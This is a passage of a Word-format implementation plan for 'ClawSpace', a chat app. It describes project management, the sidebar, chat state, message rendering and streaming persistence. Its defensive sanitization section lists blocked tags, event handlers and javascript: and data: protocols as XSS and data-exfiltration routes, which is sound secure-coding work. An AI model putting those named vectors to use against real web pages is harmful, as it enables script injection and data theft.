        <w:t xml:space="preserve">src/lib/projects.ts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fetchProjects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'sort_order'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createProject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Validate and sanitize inputs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 name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Validate icon is a single emoji or short string, not arbitrary HTML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Validate color is a hex color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[0-9a-fA-F]{6}$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Session key is derived from a crypto-random UUID.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prevents users from crafting session keys that collide with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other users' sessions or system sessions (e.g. "agent:main:main").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`agent:main:clawspace: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updateProject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(updates)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deleteProject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step-4.3-sidebar-component"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4.3: Sidebar Component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src/components/sidebar/sidebar.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Build a sidebar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Header:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">App logo +</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ClawSpace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">title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Connection status indicator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(colored dot: green=connected, yellow=connecting, red=disconnected)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Project list:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Scrollable list of projects</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Each item: icon + name + unread badge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Active project highlighted</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Click to navigate to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/project/[id]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Project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at the bottom → opens create dialog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at the very bottom (gear icon)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On mobile (&lt; 768px), sidebar becomes a sheet (slide-out drawer) triggered by hamburger menu.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:bookmarkStart w:id="63" w:name="step-4.4-new-project-dialog"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4.4: New Project Dialog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A dialog/modal with:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Name input (required)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Description textarea (optional)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Icon picker (grid of common emojis)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Color picker (predefined palette of 12 colors)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Submit → calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">createProject</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ navigates to the new project</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="63"/>
    <w:bookmarkStart w:id="64" w:name="step-4.5-project-settings-page"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4.5: Project Settings Page</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(app)/project/[id]/settings/page.tsx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(or a dialog from the project view):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Name, description, icon, color (editable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Model override (dropdown or text input)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Custom instructions (textarea —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">These instructions will be appended to every message in this project</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”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Session management: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Reset Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button → calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions.reset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(clears context window)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1025"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Delete Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">button → calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions.delete</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Archive / Delete project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phase-5-chat-interface"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 5: Chat Interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~5 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 4 (projects exist), Phase 2 (gateway client)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XSS-safe markdown rendering, sanitized HTML output, safe link handling</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="66" w:name="step-5.1-chat-store"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5.1: Chat Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/stores/chat-store.ts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ChatEventPayload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'@/lib/gateway/types'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toolCalls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True while this message is still streaming */</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  isStreaming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ChatState {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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addMessage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handleChatEvent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ChatEventPayload)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clearMessages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Resolve projectId from sessionKey.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Session keys are: agent:main:clawspace:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;projectId&gt;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projectIdFromSessionKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(sessionKey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'agent:main:clawspace:'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(prefix))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(prefix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useChatStore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addMessage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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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setMessages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setLoading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handleChatEvent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ChatEventPayload)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projectIdFromSessionKey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'delta'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Append streaming content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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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stream — create streaming state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longer "loading" — now "streaming"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Append to existing stream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Stream complete — finalize into a message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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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Aborted — finalize whatever we have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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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(streaming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NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[projectId]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*(generation aborted)*'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streamingByProject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loadingByProject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'[chat] Error event:'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clearMessages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messagesByProject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messagesByProject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[projectId]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66"/>
    <w:bookmarkStart w:id="67" w:name="step-5.2-message-list-component"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5.2: Message List Component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src/components/chat/message-list.tsx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Scrollable container using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ScrollArea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from shadcn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Auto-scroll to bottom on new messages (with smart scroll — only if user is near bottom)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Load older messages on scroll to top (calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with pagination)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Render each message via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MessageBubble</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Show streaming text at the bottom when active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Empty state:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Start a conversation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with suggestions</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="step-5.3-message-bubble-component"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5.3: Message Bubble Component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src/components/chat/message-bubble.tsx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User messages:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Right-aligned, colored background (project color)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Assistant messages:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Left-aligned, neutral background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Content rendering:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Full markdown with: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react-markdown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remark-gfm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(tables, strikethrough, etc.)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rehype-highlight</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(syntax highlighting in code blocks)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rehype-sanitize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(XSS protection —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mandatory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, see below)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Custom code block component with copy button + language label</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1028"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click on code blocks to open in artifact panel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Tool call sections:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Collapsible cards showing tool name, input, output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Timestamp:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Subtle relative time (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2m ago</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”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Copy button:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">On hover, show copy-to-clipboard button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 — XSS PREVENTION (CRITICAL):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Assistant messages can contain ANYTHING — the AI or a compromised gateway could emit malicious HTML, JavaScript, or event handlers. EVERY markdown render MUST use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rehype-sanitize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">with a strict schema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/lib/markdown-config.ts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— Shared sanitization config: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defaultSchema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'hast-util-sanitize'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'hast-util-sanitize'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Custom sanitization schema.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Start from the GitHub-flavored default and REMOVE dangerous elements.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sanitizeSchema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attributes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Allow class names for syntax highlighting (rehype-highlight)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(defaultSchema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(defaultSchema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🔒 Block all event handler attributes globally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(defaultSchema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(attr)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attr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Remove dangerous tags that could execute scripts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  tagNames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(defaultSchema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(tag)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'iframe'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'embed'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(tag)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Only allow safe URL protocols in links and images</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  protocols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'mailto'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javascript: or data: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No data: in img src (prevents data exfil)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Usage in react-markdown:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// &lt;ReactMarkdown rehypePlugins={[[rehypeSanitize, sanitizeSchema], rehypeHighlight]}&gt;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Links in assistant messages MUST open in a new tab with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. This prevents the opened page from accessing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">window.opener</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(which could manipulate ClawSpace). Configure this as a custom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component in react-markdown:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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href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{href}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}}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:bookmarkStart w:id="69" w:name="step-5.4-message-input-component"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5.4: Message Input Component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src/components/chat/message-input.tsx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Multi-line textarea (auto-growing)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Enter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to send,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Shift+Enter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for newline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send button (arrow icon) — disabled when empty or disconnected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Stop button</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(square icon) — visible during generation, calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.abort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Character count (subtle, when &gt; 1000 chars)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1029"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disabled state with message when not connected to Gateway</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="step-5.5-thinking-indicator"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5.5: Thinking Indicator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src/components/chat/thinking-indicator.tsx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t xml:space="preserve">Animated dots or pulse animation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Thinking…</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">while waiting for first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event</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transitions to streaming text once deltas arrive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1030"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Shows in assistant message position (left-aligned)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="step-5.6-streaming-text-display"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5.6: Streaming Text Display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src/components/chat/streaming-text.tsx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Renders the current streaming content with markdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adds a blinking cursor at the end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Updates in real-time as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events arrive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031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to avoid re-rendering entire markdown on each character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phase-6-streaming-chat-integration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 6: Streaming &amp; Chat Integration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Time estimate: ~4 hours</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Dependencies: Phase 5 (UI), Phase 2 (gateway client)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Event payload validation, safe session key routing, message content bounds checking</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="73" w:name="step-6.1-wire-up-chat-to-gateway"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6.1: Wire Up Chat to Gateway</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the project page, connect the chat components to the gateway:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">src/app/(app)/project/[id]/page.tsx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useProjectStore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'@/stores/project-store'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useChat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'@/lib/gateway/hooks'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useGatewayStore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'@/stores/gateway-store'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MessageList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'@/components/chat/message-list'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MessageInput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'@/components/chat/message-input'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ArtifactPanel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'@/components/artifacts/artifact-panel'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useProjectStore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useGatewayStore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streaming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sendMessage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abortGeneration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sessionKey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history from Gateway on mount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(isConnected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sessionKey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loadHistory])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render split layout with chat + artifact panel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step-6.2-message-persistence-to-supabase"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6.2: Message Persistence to Supabase</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After each message (user sent, assistant finalized), persist to Supabase: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persistMessage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tool_calls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Load from Supabase on initial page load (before Gateway history, for instant render):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loadPersistedMessages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ChatMessage[]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tool_calls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Strategy:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Load from Supabase first (instant), then reconcile with Gateway history (authoritative). This gives fast initial render + eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="X3eaa6a2d3b12d2b537db330e6ada4bc8ca58154"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6.3: Handle the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chat.history</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Response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chat.history</w:t>
      </w:r>
